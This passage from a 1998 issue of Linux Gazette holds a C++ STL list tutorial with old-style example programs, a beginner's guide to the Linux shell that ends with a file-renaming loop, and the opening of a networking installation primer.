  #define WARNING 2
#
  int return_code;
#
  list<string> InfoMessages;
  list<string> WarningMessages;
#
  // during a program these messages are loaded at various points
  InfoMessages.push_back("Info: Program started");
  // do work...
  WarningMessages.push_back("Warning: No Customer records have been found");
  // do work...
 #
  return_code = OK; 
 #
  if  (!InfoMessages.empty()) {          // there were info messages
     InfoMessages.push_front("Informational Messages:");
     // ... print the info messages list, we'll see how later
     return_code = INFO;
  }
#
  if  (!WarningMessages.empty()) {       // there were warning messages
     WarningMessages.push_front("Warning Messages:");
     // ... print the warning messages list, we'll see how later
     return_code = WARNING;              
  }
#
  // If there were no messages say so.
  if (InfoMessages.empty() && WarningMessages.empty()) {
     cout << "There were no messages " << endl;
  }
#
  return return_code;
}


Processing elements in a list with a for loop

We will want to be able to iterate through any list, for example to print all the objects in it and see the effect of various operations. To iterate through a list element by element, we can proceed as follows:

 
/*
|| How to print the contents of a simple STL list. Whew! 
*/
#include <iostream.h>
#include <string>
#include <list>
#
int main (void) {
list<string> Milkshakes;
list<string>::iterator MilkshakeIterator;
#
  Milkshakes.push_back("Chocolate");
  Milkshakes.push_back("Strawberry");
  Milkshakes.push_front("Lime");
  Milkshakes.push_front("Vanilla");
 # 
  // print the milkshakes
  Milkshakes.push_front("The Milkshake Menu");
  Milkshakes.push_back("*** Thats the end ***");
  for (MilkshakeIterator=Milkshakes.begin(); 
         MilkshakeIterator!=Milkshakes.end(); 
          ++MilkshakeIterator) {
    // dereference the iterator to get the element
    cout << *MilkshakeIterator << endl;
  }     
}
In this program we define an iterator, MilkshakeIterator. We set MilkshakeIterator to the first element of the list. To do this we call Milkshakes.begin() which returns an iterator to the beginning of the list. We then compare MilkshakeIterator to the end of list value Milkshakes.end(), and stop when we get there.

The end() function of a container returns an iterator to the position one past the end of the container. When we get there, we stop processing. We cannot dereference the iterator returned by a container's end() function. We just know it means we have passed the end of the container and should stop processing elements. This holds for all STL containers.

In the above example at each pass through the for loop we dereference the iterator to obtain the string, which we print.

In STL programming we use one or more iterators in every algorithm. We use them to access objects in a container. To access a given object we point the iterator at the required object, then we dereference the iterator.

The list container, in case you're wondering, does not support adding a number to a list iterator to jump to another object in the container. That is, we cannot say Milkshakes.begin()+2 to point to the third object in the list, because the STL list is implemented as a doubly linked list, which does not support random access. The vector and deque containers, other STL containers, do provide random access.
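If you need to jump ahead in a list, the iterator helper advance() will step a bidirectional iterator for you, one hop at a time. A minimal sketch, in the same pre-standard style as the other examples (advance() is declared in the iterator header):

#include <list>
#include <iterator>

int main (void) {
  list<int> Numbers;

  Numbers.push_back(10);
  Numbers.push_back(20);
  Numbers.push_back(30);

  list<int>::iterator It = Numbers.begin();

  // Numbers.begin()+2 will not compile for a list;
  // advance() walks the iterator forward two hops instead
  advance(It, 2);    // It now points at the third element, 30
}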

The milkshake program above printed the contents of the list. Anyone reading it can immediately see how it works. It uses standard iterators and a standard list container. There is not much programmer-dependent stuff in it, and no home-grown list implementation. Just standard C++. That's an important step forward. Even this simple use of STL makes our software more standard.


Processing elements in a list with the STL generic algorithm for_each

Even with an STL list and iterator we are still initialising, testing, and incrementing the iterator to iterate through a container. The STL generic for_each algorithm can relieve us of that work.

 
/*
|| How to print a simple STL list MkII
*/
#include <iostream.h>
#include <string>
#include <list>
#include <algorithm>
#
void PrintIt (string& StringToPrint) {
  cout << StringToPrint << endl;
}
#
int main (void) {
  list<string> FruitAndVegetables;
  FruitAndVegetables.push_back("carrot");
  FruitAndVegetables.push_back("pumpkin");
  FruitAndVegetables.push_back("potato");
  FruitAndVegetables.push_front("apple");
  FruitAndVegetables.push_front("pineapple");
 #
  for_each  (FruitAndVegetables.begin(), FruitAndVegetables.end(), PrintIt);
}
In this program we use the STL generic algorithm for_each() to iterate through an iterator range and invoke the function PrintIt() on each object. We don't need to initialise, test or increment any iterators. for_each() nicely modularises our code. The operation we are performing on the object is nicely packaged away in a function, we have gotten rid of the loop, and our code is clearer.

The for_each algorithm introduces the concept of an iterator range, specified by a start iterator and an end iterator. The start iterator specifies where to start processing and the end iterator signifies where to stop processing, but is not included in the range.


Counting elements in a list with the STL generic algorithm count()

The STL generic algorithms count() and count_if() count occurrences of objects in a container. Like for_each(), the count() and count_if() algorithms take an iterator range.

Let's count the number of best possible scores in a list of students' exam scores, a list of ints.

 
/*
|| How to count objects in an STL list
*/
#include <list>
#include <algorithm>
#
int main (void) {
  list<int> Scores;
#
  Scores.push_back(100); Scores.push_back(80);
  Scores.push_back(45); Scores.push_back(75);
  Scores.push_back(99); Scores.push_back(100);
#
  int NumberOf100Scores(0);     
  count (Scores.begin(), Scores.end(), 100, NumberOf100Scores);
#
  cout << "There were " << NumberOf100Scores << " scores of 100" << endl;
}
The count() algorithm counts the number of objects equal to a certain value. In the above example it checks each integer object in a list against 100. It increments the variable NumberOf100Scores each time a container object equals 100. The output of the program is
 
  There were 2 scores of 100


Counting elements in a list with the STL generic algorithm count_if()

count_if() is a much more interesting version of count(). It introduces a new STL component, the function object. count_if() takes a function object as a parameter. A function object is a class with at least operator () defined. Some STL algorithms accept function objects as parameters and invoke operator () of the function object for each container object being processed.

Function objects intended for use with STL algorithms have their function call operator returning true or false. They are called predicate function objects for this reason. An example will make this clear. count_if() uses the passed in function object to make a more complex assessment than count() of whether an object should be counted. In this example we will count toothbrushes sold. We will refer to sales records containing a four character product code and a description of the product.

 
/*
|| Using a function object to help count things
*/
#include <string>
#include <list>
#include <algorithm>
#
const string ToothbrushCode("0003");
#
class IsAToothbrush {
public:  
bool operator() ( string& SalesRecord ) {
    return SalesRecord.substr(0,4)==ToothbrushCode;
  }     
};
#
int main (void) {
  list<string> SalesRecords;
#
  SalesRecords.push_back("0001 Soap");
  SalesRecords.push_back("0002 Shampoo");
  SalesRecords.push_back("0003 Toothbrush");
  SalesRecords.push_back("0004 Toothpaste");
  SalesRecords.push_back("0003 Toothbrush");
 # 
  int NumberOfToothbrushes(0);  
  count_if (SalesRecords.begin(), SalesRecords.end(), 
             IsAToothbrush(), NumberOfToothbrushes);
#
  cout << "There were " 
       << NumberOfToothbrushes 
       << " toothbrushes sold" << endl;
}
The output of the program is
 
There were 2 toothbrushes sold
The program works as follows: A function object class is defined, IsAToothbrush. Objects of this class can determine whether a sales record is a toothbrush sales record or not. Their function call operator () will return true if a record is a toothbrush sales record and false otherwise.

The count_if() algorithm will process container objects in the range specified by the first and second iterator parameters. It will increment NumberOfToothbrushes for each object in the container for which IsAToothbrush()() returns true.

The net result is that NumberOfToothbrushes will contain the number of sales records where the product code was "0003", that is, where the product was a toothbrush.

Note that the third parameter to count_if(), IsAToothbrush(), is a temporary object constructed with its default constructor. The () do not signify a function call. You are passing a temporary object of class IsAToothbrush to count_if(). count_if() will internally invoke IsAToothbrush()() for each object in the container.


A more complex function object with the STL generic algorithm count_if()

We can further develop the idea of the function object. Assume we need to pass more information to a function object. We cannot do this using the function call operator, because that must be defined to take only an object of the value type of the list. However, by specifying a non-default constructor for IsAToothbrush we can initialise it with whatever information we need. We might need a variable code for a toothbrush, for example. We can add this extra information into the function object as follows:

 
/*
|| Using a more complex function object
*/
#include <iostream.h>
#include <string>
#include <list>
#include <algorithm>
#
class IsAToothbrush {
public:
  IsAToothbrush(string& InToothbrushCode) : 
      ToothbrushCode(InToothbrushCode) {}
  bool operator() (string& SalesRecord) {
    return SalesRecord.substr(0,4)==ToothbrushCode;
}       
private:
  string ToothbrushCode;        
};
#
int main (void) {
  list<string> SalesRecords;
#
  SalesRecords.push_back("0001 Soap");
  SalesRecords.push_back("0002 Shampoo");
  SalesRecords.push_back("0003 Toothbrush");
  SalesRecords.push_back("0004 Toothpaste");
  SalesRecords.push_back("0003 Toothbrush");
 # 
  string VariableToothbrushCode("0003");
#
  int NumberOfToothbrushes(0);  
  count_if (SalesRecords.begin(), SalesRecords.end(), 
              IsAToothbrush(VariableToothbrushCode),
                 NumberOfToothbrushes);
  cout << "There were  "
       << NumberOfToothbrushes 
       << " toothbrushes matching code "
       << VariableToothbrushCode
       << " sold" 
       << endl;
}
The output of the program is
 
There were  2 toothbrushes matching code 0003 sold
This example shows how to pass information to the function object. You can define any constructors that you like and you can do any processing in the function object that you like, well, that the compiler will tolerate anyhow.

You can see that function objects really extend the basic counting algorithm.

At this stage we have covered:

  1. defining a list and adding elements with push_back() and push_front()
  2. testing whether a list is empty with empty()
  3. iterating through a list with a for loop and with the for_each() algorithm
  4. counting elements with count() and count_if(), using function objects

These examples were chosen to show commonly needed list operations. If you understand these basic principles you will have no trouble using STL productively. Mind you, it does take some practice. We'll now extend our knowledge with some more complicated operations, both list member functions and STL generic algorithms.


Finding objects in a list using the STL generic algorithm find()

How do we find something in a list? The STL generic algorithms find() and find_if() will do that. Like for_each(), count(), and count_if(), these algorithms take an iterator range, specifying what part of a list (or any other container, for that matter) to process. As usual, the first iterator specifies where to start processing and the second specifies where to stop. The position specified by the second iterator is not included in processing.

Here's how find() works.

 
/*
|| How to find things in an STL list
*/
#include <string>
#include <list>
#include <algorithm>
#
int main (void) {
  list<string> Fruit;
  list<string>::iterator FruitIterator;
#
  Fruit.push_back("Apple");
  Fruit.push_back("Pineapple");
  Fruit.push_back("Star Apple");
#
  FruitIterator = find (Fruit.begin(), Fruit.end(), "Pineapple");
#
  if (FruitIterator == Fruit.end()) {  
    cout << "Fruit not found in list" << endl; 
  }
  else {
   cout << *FruitIterator << endl;
  }
}
The output of the program will be
 
Pineapple
If find does not find the specified object, it returns the past the end iterator Fruit.end(). Otherwise it returns an iterator to the found list object.


Finding objects in a list using the STL generic algorithm find_if()

There is another more powerful version of find(). This example demonstrates find_if(), which accepts a function object as a parameter, and uses it to make a more complex assessment of whether an object is "found".

Say we have records containing events and dates stored in chronological order in a list. We wish to find the first event that took place in 1997.

 
/*
|| How to find things in an STL list MkII 
*/
#include <string>
#include <list>
#include <algorithm>
#
class EventIsIn1997 {
public:
 bool operator () (string& EventRecord) {
   // year field is at position 12 for 4 characters in EventRecord      
   return EventRecord.substr(12,4)=="1997";
  }  
};
#
int main (void) {
  list<string> Events;
#
// string positions 0123456789012345678901234567890123456789012345      
  Events.push_back("07 January  1995  Draft plan of house prepared");
  Events.push_back("07 February 1996  Detailed plan of house prepared");
  Events.push_back("10 January  1997  Client agrees to job");
  Events.push_back("15 January  1997  Builder starts work on bedroom");
  Events.push_back("30 April    1997  Builder finishes work");
 # 
  list<string>::iterator EventIterator = 
      find_if (Events.begin(), Events.end(), EventIsIn1997());
#
  // find_if completes the first time EventIsIn1997()() returns true 
  // for any object. It returns an iterator to that object which we 
  // can dereference to get the object, or if EventIsIn1997()() never
  // returned true, find_if returns end()
  if (EventIterator==Events.end()) {  
    cout << "Event not found in list" << endl; 
  }
  else {
   cout << *EventIterator << endl;
  }
}
The output of the program will be
 
10 January  1997  Client agrees to job


Finding sequences in a list using the STL generic algorithm search

Some characters are a little easier to deal with in an STL container. Let's look at a sequence of characters that can be difficult to work with. We'll define an STL list to hold the characters.

 
  list<char> Characters;
We now have a rock-solid sequence of characters that knows how to manage its own memory without any help. It knows precisely where it starts and ends. That's a useful thing. I don't know if I'd say that about a null-terminated array of characters.

Let's add some of our favourite characters to the list.

 
  Characters.push_back('\0');
  Characters.push_back('\0');
  Characters.push_back('1');
  Characters.push_back('2');
How many null characters have we got?
 
  int NumberOfNullCharacters(0);
  count(Characters.begin(), Characters.end(), '\0', NumberOfNullCharacters);
  cout << "We have " << NumberOfNullCharacters << endl;
Let's find the character '1'
 
  list<char>::iterator Iter;
  Iter = find(Characters.begin(), Characters.end(), '1');
  cout << "We found " << *Iter << endl;
This example is intended to show that STL containers allow you to handle null characters in a more standard way. Now let's search a container for two nulls with the STL search algorithm.

The STL generic algorithm search() searches a container, as you may have guessed, but for a sequence of elements, unlike find() and find_if(), which search for a single element.

 
/*
|| How to use the search algorithm in an STL list
*/
#include <string>
#include <list>
#include <algorithm>
#
int main ( void ) { 
#
  list<char> TargetCharacters;
  list<char> ListOfCharacters;
#
  TargetCharacters.push_back('\0');
  TargetCharacters.push_back('\0');
#
  ListOfCharacters.push_back('1');
  ListOfCharacters.push_back('2');
  ListOfCharacters.push_back('\0');
  ListOfCharacters.push_back('\0');
#
  list<char>::iterator PositionOfNulls = 
    search(ListOfCharacters.begin(), ListOfCharacters.end(), 
            TargetCharacters.begin(), TargetCharacters.end());
#
  if (PositionOfNulls!=ListOfCharacters.end())
    cout << "We found the nulls" << endl;
}
The output of the program will be
 
We found the nulls
The search algorithm finds the first occurrence of one sequence in another sequence. In this case we search for the first occurrence of TargetCharacters which is a list containing two null characters, in ListOfCharacters.

The parameters for search are two iterators specifying a range to search, and two more iterators specifying a range to search for. So we are looking for the entire range of the TargetCharacters list, in the entire range of ListOfCharacters.

If TargetCharacters is found, search will return an iterator to the first character in ListOfCharacters where the sequences matched. If a match is not found, search will return the past the end value ListOfCharacters.end().


Sorting a list using the list member function sort()

To sort a list we use the list member function sort(), not the generic algorithm sort(). All the algorithms we have been using up till now have been generic algorithms. However in STL, sometimes a container will supply its own implementation of a particular algorithm, either through necessity or for enhanced performance.

In this case the list container has its own sort because the generic sort algorithm only sorts containers which provide random access to the elements inside. The list container does not provide random access to the elements in the list, because it is implemented as a linked list. A special sort() member function is needed which can sort a linked list.

You'll find this with STL. For various reasons the containers will supply extra functions, where necessary for efficiency or where special performance gains can be made by taking advantage of some special feature of a container's structure.

 
/*
|| How to sort an STL list
*/
#include <string>
#include <list>
#include <algorithm>
#
void PrintIt (string& StringToPrint) { cout << StringToPrint << endl; }
#
int main (void) {
  list<string> Staff;
  list<string>::iterator PeopleIterator;
#
  Staff.push_back("John");
  Staff.push_back("Bill");
  Staff.push_back("Tony");
  Staff.push_back("Fidel");
  Staff.push_back("Nelson"); 
#
  cout << "The unsorted list " << endl;
  for_each(Staff.begin(), Staff.end(), PrintIt );
#
  Staff.sort();
#
  cout << "The sorted list " << endl;
  for_each(Staff.begin(), Staff.end(), PrintIt); 
}
The output is
 
The unsorted list 
John
Bill
Tony
Fidel
Nelson
The sorted list 
Bill
Fidel
John
Nelson
Tony


Inserting elements in a list with the insert() list member function

The list member functions push_front() and push_back() add elements to the front and back of a list respectively. You can also add an object at any point in a list with insert().

insert() can add one object, a number of copies of an object, or a range of objects. Here are some examples of inserting objects into a list.

 
/*
|| Using insert to insert elements into a list.
*/
#include <list>
#
int main (void) {
  list<int> list1;
#
  /*
  || Put integers 0 to 9 in the list
  */
  for (int i = 0; i < 10; ++i)  list1.push_back(i);   
#
  /*
  || Insert -1 using the insert member function
  || Our list will contain -1,0,1,2,3,4,5,6,7,8,9
  */
  list1.insert(list1.begin(), -1); 
#
  /*
  || Insert an element at the end using insert
  || Our list will contain -1,0,1,2,3,4,5,6,7,8,9,10
  */
  list1.insert(list1.end(), 10);
 # 
  /*
  || Inserting a range from another container
  || Our list will contain -1,0,1,2,3,4,5,6,7,8,9,10,11,12
  */
  int IntArray[2] = {11,12};
  list1.insert(list1.end(), &IntArray[0], &IntArray[2]);
#
  /*
  || As an exercise put the code in here to print the lists!
  || Hint: use PrintIt and accept an integer
  */
}
Note that the insert() function adds one or more elements at the position of the iterator you specify. Your elements will appear in the list before the element that was at the specified iterator position.
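One possible answer to the exercise in the comments above: a PrintIt() that accepts an int, driven by for_each() (a sketch in the same style as the earlier examples, with iostream.h included explicitly):

#include <iostream.h>
#include <list>
#include <algorithm>

// A PrintIt that accepts an integer, as the hint suggests
void PrintIt (int Element) { cout << Element << endl; }

int main (void) {
  list<int> list1;

  list1.insert(list1.begin(), -1);
  list1.insert(list1.end(), 10);

  // prints -1 then 10
  for_each (list1.begin(), list1.end(), PrintIt);
}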


List constructors

We have been defining a list like this.

 
  list<int> Fred; 
You can also define a list and initialise its elements like this
 
  // define a list of 10 elements and initialise them all to 0
  list<int> Fred(10, 0);
  // list now contains 0,0,0,0,0,0,0,0,0,0
Or you can define a list and initialise it with a range from another STL container, which doesn't have to be a list, just a container with the same value type.
 
  vector<int> Harry;
  Harry.push_back(1); 
  Harry.push_back(2); 
#
  // define a list and initialise it with the elements in Harry
  list<int> Bill(Harry.begin(), Harry.end());
  // Bill now contains 1,2


Erasing elements from a list using list member functions

The list member function pop_front() removes the first element from a list. pop_back() removes the last element. The member function erase() erases the element pointed to by an iterator. There is another erase() function which can erase a range of elements.

 
/*
|| Erasing objects from a list
*/
#include <list>
#
int main (void) {
  list<int> list1;   // define a list of integers
#
  /*
  || Put some numbers in the list
  || It now contains 0,1,2,3,4,5,6,7,8,9
  */
  for (int i = 0; i < 10; ++i)  list1.push_back(i);
#
  list1.pop_front();    // erase the first element 0
#
  list1.pop_back();     // erase the last element 9
 # 
  list1.erase(list1.begin());  // erase the first element (1) using an iterator
#
  list1.erase(list1.begin(), list1.end());  // erase all the remaining elements
#
  cout << "list contains " << list1.size() << " elements" << endl;
}
The output will be
 
list contains 0 elements


Removing elements from a list using the list member function remove()

The list member function remove() erases objects from a list.

 
/*
|| Using the list member function remove to remove elements
*/
#include <string>
#include <list>
#include <algorithm>
#
void PrintIt (const string& StringToPrint) {
  cout << StringToPrint << endl;
}
#
int main (void) {
  list<string> Birds;
#
  Birds.push_back("cockatoo");
  Birds.push_back("galah");
  Birds.push_back("cockatoo");
  Birds.push_back("rosella");
  Birds.push_back("corella");
#
  cout << "Original list with cockatoos" << endl;
  for_each(Birds.begin(), Birds.end(), PrintIt); 
 # 
  Birds.remove("cockatoo"); 
#
  cout << "Now no cockatoos" << endl;
  for_each(Birds.begin(), Birds.end(), PrintIt); 
  
}
The output will be
 
Original list with cockatoos
cockatoo
galah
cockatoo
rosella
corella
Now no cockatoos
galah
rosella
corella


Removing elements from a list with the STL generic algorithm remove()

The generic algorithm remove() works in a different way to the list member function remove(). The generic version does not change the size of the container.

 
/*
|| Using the generic remove algorithm to remove list elements
*/
#include <string>
#include <list>
#include <algorithm>
#
void PrintIt (string& AString) { cout << AString << endl; }
#
int main (void) {
  list<string> Birds;
  list<string>::iterator NewEnd;
#
  Birds.push_back("cockatoo");
  Birds.push_back("galah");
  Birds.push_back("cockatoo");
  Birds.push_back("rosella");
  Birds.push_back("king parrot");
#
  cout << "Original list" << endl; 
  for_each(Birds.begin(), Birds.end(), PrintIt);
#
  NewEnd = remove(Birds.begin(), Birds.end(), "cockatoo"); 
#
  cout << endl << "List according to new past the end iterator" << endl; 
  for_each(Birds.begin(), NewEnd, PrintIt);
#
  cout << endl << "Original list now. Care required!" << endl; 
  for_each(Birds.begin(), Birds.end(), PrintIt);
}
The output will be
Original list
cockatoo
galah
cockatoo
rosella
king parrot

List according to new past the end iterator
galah
rosella
king parrot

Original list now. Care required!
galah
rosella
king parrot
rosella
king parrot
The generic remove() algorithm returns an iterator specifying a new end to the list. The range from the beginning to the new end (not including the new end) contains the elements left after the remove. You can then erase the range from the new end to the old end using the list member function erase.
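Continuing the bird example, a minimal sketch of that two-step clean-up, often called the erase-remove idiom:

#include <string>
#include <list>
#include <algorithm>

int main (void) {
  list<string> Birds;

  Birds.push_back("cockatoo");
  Birds.push_back("galah");
  Birds.push_back("cockatoo");

  // remove() shuffles the survivors to the front and returns the new end...
  list<string>::iterator NewEnd =
      remove(Birds.begin(), Birds.end(), "cockatoo");

  // ...and the member function erase() actually shrinks the list
  Birds.erase(NewEnd, Birds.end());

  // Birds now holds just "galah"
}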


Partitioning a list with the STL generic algorithm stable_partition() and using the list member function splice()

We will finish off with a slightly more complicated example. It demonstrates the STL generic stable_partition() algorithm and one variation of the list member function splice(). Notice the use of function objects, and the absence of loops. Control passes through a series of simple statements, which are calls to STL algorithms.

stable_partition() is an interesting function. It rearranges elements so that those which satisfy a certain condition come before those which do not. It preserves the relative order of the two groups of elements. An example will make this clear.

splice() moves the elements of another list into the list; it removes them from the source list.

In this example we want to accept some flags and four filenames from the command line. The filenames must appear in order. By using stable_partition() we can accept the flags at any position relative to the filenames and get them together without disturbing the order of the filename parameters.

Because the counting and finding algorithms are readily available, we can call them as necessary to determine which flag was set, rather than maintaining separate flag variables in our program. I find containers very convenient for managing small amounts of variable dynamic data like this.

 
/*
|| Using the STL stable_partition algorithm
|| Takes any number of flags on the command line and 
|| four filenames in order.
*/
#include <string>
#include <list>
#include <algorithm>
#
PrintIt ( string& AString ) { cout << AString << endl; }
#
class IsAFlag {
public: 
  bool operator () (string& PossibleFlag) {
    return PossibleFlag.substr(0,1)=="-";
  }
};
#
class IsAFileName {
public:  
  bool operator () (string& StringToCheck) {
    return !IsAFlag()(StringToCheck);
  }
};
#
class IsHelpFlag {
public:  
  bool operator () (string& PossibleHelpFlag) {
    return PossibleHelpFlag=="-h";
  }
};
#
int main (int argc, char *argv[]) {
#
list<string> CmdLineParameters;       // the command line parameters
list<string>::iterator StartOfFiles;  // start of filenames 
list<string> Flags;                   // list of flags
list<string> FileNames;               // list of filenames
#
for (int i = 0; i < argc; ++i) CmdLineParameters.push_back(argv[i]);
#
CmdLineParameters.pop_front(); // we don't want the program name
#
// make sure we have the four mandatory file names
int NumberOfFiles(0);
count_if(CmdLineParameters.begin(), CmdLineParameters.end(), 
       IsAFileName(), NumberOfFiles);
#
cout << "The " 
     << (NumberOfFiles == 4 ? "correct " : "wrong ")
     << "number (" 
     << NumberOfFiles 
     << ") of file names were specified" << endl;
 #   
// move any flags to the beginning
StartOfFiles = 
  stable_partition(CmdLineParameters.begin(), CmdLineParameters.end(), 
         IsAFlag()); 
#
cout << "Command line parameters after stable partition" << endl;
for_each(CmdLineParameters.begin(), CmdLineParameters.end(), PrintIt);
#
// Splice any flags from the original CmdLineParameters list into Flags list. 
Flags.splice(Flags.begin(), CmdLineParameters,
       CmdLineParameters.begin(), StartOfFiles);
#
if (!Flags.empty()) {
  cout << "Flags specified were:" << endl;
  for_each(Flags.begin(), Flags.end(), PrintIt);
}
else {
  cout << "No flags were specified" << endl;
} 
#
// parameters list now contains only filenames. Splice them into FileNames list.
FileNames.splice(FileNames.begin(), CmdLineParameters, 
       CmdLineParameters.begin(), CmdLineParameters.end());
#
if (!FileNames.empty()) {
  cout << "Files specified (in order) were:" << endl;
  for_each(FileNames.begin(), FileNames.end(), PrintIt);
}
else {
  cout << "No files were specified" << endl;
} 
#
// check if the help flag was specified
if (find_if(Flags.begin(), Flags.end(), IsHelpFlag())!=Flags.end()) {
  cout << "The help flag was specified" << endl;
}
#
// open the files and do whatever you do
#
}
Given this command line:
 
test17 -w linux -o is -w great
the output is
 
The wrong number (3) of file names were specified
Command line parameters after stable partition
-w
-o
-w
linux
is
great
Flags specified were:
-w
-o
-w
Files specified (in order) were:
linux
is
great


Conclusion

We have only touched on the things you can do with a list. We haven't even got to the point of storing a user-defined class of object, although that's not hard.

If you understand the concepts behind the algorithms presented here you should have no trouble using the rest. The important thing with STL is to get the basics right.

The key to STL is really the iterator. STL algorithms take iterators as parameters. They take iterator ranges, sometimes one range, sometimes two. STL containers provide the iterators. That's why we say list<int>::iterator, or list<char>::iterator, or list<string>::iterator.

Iterators have a well-defined hierarchy. They have varying "powers". Some iterators provide read-only access to a container, some write-only. Some can only iterate forwards, some are bidirectional. Some iterators provide random access to a container.

STL algorithms require a certain "power" of iterator. If the container doesn't provide an iterator of that power, the algorithm will not compile. For example, the list container only provides bidirectional iterators. The generic sort() algorithm requires random access iterators. That's why we need the special list member function sort().
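A tiny illustration of that last point:

#include <list>
#include <algorithm>

int main (void) {
  list<int> Numbers;

  Numbers.push_back(3);
  Numbers.push_back(1);

  // sort(Numbers.begin(), Numbers.end());  // will not compile:
  //                                        // list iterators are not random access
  Numbers.sort();                           // the member function works
}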

To really use STL properly you will need to carefully study the various kinds of iterators. You need to see just what kinds of iterators are provided by what containers. You then need to see what type of iterators the algorithms require. You need, of course, to understand what kinds of iterators you can have.


Using STL in the field

During the past year I have written a number of commercial C++ programs using STL. It reduced my effort and almost eliminated logic errors in all cases.

The largest program is about 5000 lines. Probably the most striking thing about it is its speed. It reads and extensively processes a 1-2 MB transaction file in about twenty seconds. It was developed with GCC 2.7.2 on Linux and now runs on an HP-UX machine. It uses over 50 function objects and many containers ranging in size from small lists to a map with over 14,000 elements.

The function objects in the program are in a hierarchy where top level function objects call lower level ones. I used the STL algorithms for_each(), find(), find_if(), count() and count_if() extensively. I reduced nearly all of the internals of the program to STL algorithm calls.

STL tended to automatically organise my code into distinct control and support sections. By carefully crafting function objects and giving them meaningful names I managed to move them out of sight and concentrate on the flow of control in my software.

There is much more to know about STL programming and I hope you have enjoyed working through these examples.

The two books in the bibliography both have active errata pages on the web so you can keep them right up to date.

Stroustrup has an advice section at the back of each chapter which is excellent, especially for beginners, and the whole book is in a much more conversational style than the earlier editions. It is also much larger. There are of course quite a few other books on STL in the bookshops. Have a look and see what you can find.

Bibliography

The STL Tutorial and Reference Guide, David Musser and Atul Saini. Addison Wesley 1996.

The C++ Programming Language 3e, Bjarne Stroustrup. Addison Wesley 1997.


Copyright © 1998, Scott Field
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Linux Basics

By Paul Anderson


I was reading through the Linux Gazette Mailbag column, and noticed a number of requests for basic info about Linux and the use thereof. In this doc, I'll cover the basics of logging in, using the shell, and even some rudimentary shell scripting and various useful utilities. I won't, however, cover the use of X Windows, as that can be a whole subject unto itself. Also, I will only be able to cover the Debian distribution, as I don't have Red Hat or S.u.S.E. or other distributions around here.

Before I begin, I would like to make one point: Linux is much more powerful than any Microsoft product, and with that greater power comes the responsibility to learn how to use it properly. This is to be expected, and is much less painful than many make it out to be.


Logging In


So, you've got Linux installed on your system and you're just about to begin using it. You're presented with a screen looking like this:

Debian GNU Linux 1.3 geeky1 tty1

geeky1 login:

You probably created a personal account for yourself, and we'll use that. In these examples, the account is paul, password password. Now, at the login prompt type in your username, in our example, paul. The screen will now look like this:

Debian GNU Linux 1.3 geeky1 tty1

geeky1 login: paul
Password:
Now, watch your fingers while you type in the password - it won't be echoed for security reasons, and watching your fingers will help keep you from making a mistake. The system will now display the contents of /etc/motd, and run the file .bash_profile in your home directory if you're using the bash shell (most distributions default to bash).


Using The Shell

The shell is kind of like DOS's command.com, but MUCH more powerful. The first command we're going to use is the touch command. All it does is either create an empty file, or update the last modified date on an already existing file. The shell prompt will probably look like a dollar sign. First, we want to make a directory to hold our work. At the prompt, type:
mkdir foo
Now, we want to use the ls command, which is the equivalent of DOS's dir command. While I'm at it, if you want more info on using any command listed here, type:
man command
Where command is the command you want more information on. man is short for manual page. Type ls, and it will list foo. Now, type:
cd foo
Okay, you're now in the foo directory. Oh dear, a bit confusing, isn't it? The current directory isn't displayed in the prompt. Let's fix it. The environment variable PS1 holds the specification for the prompt. Type:
export PS1="\`pwd\`:\`whoami\`:\$ "
And you'll notice your prompt has changed! Let me explain... export is used in bash to mark the variable so that it is carried to other shells you run - if you don't export the variable and run a program, the program won't know about the variable. It's good practice to use export whenever you set an environment variable. Next, you'll notice \`pwd\`. What's with this \` stuff, you ask? In bash, the backslash is used to 'escape' a character - that is, keep the shell from processing it. Why the backquote? In a shell, it tells the shell to replace the stuff inside the backquotes with what's printed on the screen by the program inside them. For example, type:
echo f`pwd`f
The system will print:
f/home/paul/foof
The shell evaluated the backquotes, and replaced the text inside them with the output of the pwd program. Now, if we hadn't escaped the backquotes, the shell would have evaluated them once when setting the variable, and the current directory portion of the prompt would always stay the same. Now, in bash, ~ refers to your home directory. Go ahead, type:
echo ~
You'll get something like:
/home/paul
So, we say that the directory foo you just created is at the path ~/foo. Now, I want you to type:
touch bork
And then type ls again. Voila! You've just created an empty file! Now, do it again, except this time creating three files - foo.txt, bork.txt and bar.txt. In DOS, if you wanted to change the extension of all of these to .html, you'd have to do it by hand, right? Linux, however, is much more powerful. Type:
for i in `ls`; do mv $i `basename $i .txt`.html; done
And do an ls again. They've all changed extension to .html! You've actually done some shell programming. You've written what's called a for loop (for obvious reasons). For every entry reported by ls, the shell variable $i is set to the entry, and the stuff after do is run. Right now would be a good time to use man to learn about the basename command. It strips off the specified extension (in this case, .txt) and returns the value of $i sans the extension. The backquotes make certain that the shell ends up seeing it as:
mv foo.txt foo.html
Amazing, eh?

This brings to an end our basic intro to the shell. Next, I hope to write an intro to emacs and writing shell scripts.

-- Paul Anderson


Copyright © 1998, Paul Anderson
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Linux Installation Primer, Part Three

By


 

Copyright © 1998 by Ron Jenkins. This work is provided on an "as is" basis. The author provides no warranty whatsoever, either express or implied, regarding the work, including warranties with respect to its merchantability or fitness for any particular purpose.

 

The author welcomes corrections and suggestions. He can be reached by electronic mail, or at his personal homepage: http://home.unicom.net/~rjenkins/

 

Part Three: Network and Dialup Networking configuration

Well, here we are ready to start part three of the series, setting up basic networking functions, and connecting your Linux machine to the outside world. As with each installment of this series, there will be some operations required by each distribution that may or may not be different in another. I will diverge from the generalized information when necessary, as always.

 

In this installment, I will cover the following topics:

 

  1. Networking fundamentals.
  2. Preparing for the networking configuration.
  3. Configuring the loopback adapter.
  4. Configuring basic networking.
  5. Connecting to your Internet Service Provider.
  6. Configuring the Domain Name Service to function on a dialup connection.
  7. Configuring Sendmail to function on a dialup connection.
  8. Testing and troubleshooting your basic and dialup configuration.
  9. Some quick and dirty "cheats" if all else fails.
  10. Stupid Network Tricks.
  11. Resources for further information.
  12. About the Author.

 

Networking fundamentals.

I won't bore you with all the nasty details of the history of the Internet, how it came to be, etc. However, some basic understanding of networking in general, and of Transmission Control Protocol/Internet Protocol (TCP/IP) in particular, is necessary to maximize your effective use of a network and, by extension, the Internet.

 

At its most fundamental level, all networks require at least three things to function:

 

  1. An interface to pass the data packets to and from the computer.
  2. A physical connection of some sort to pass the data from one place to another.
  3. And finally a mutually agreed upon format to convey that data, using a common method, or language, usually called a protocol.

 

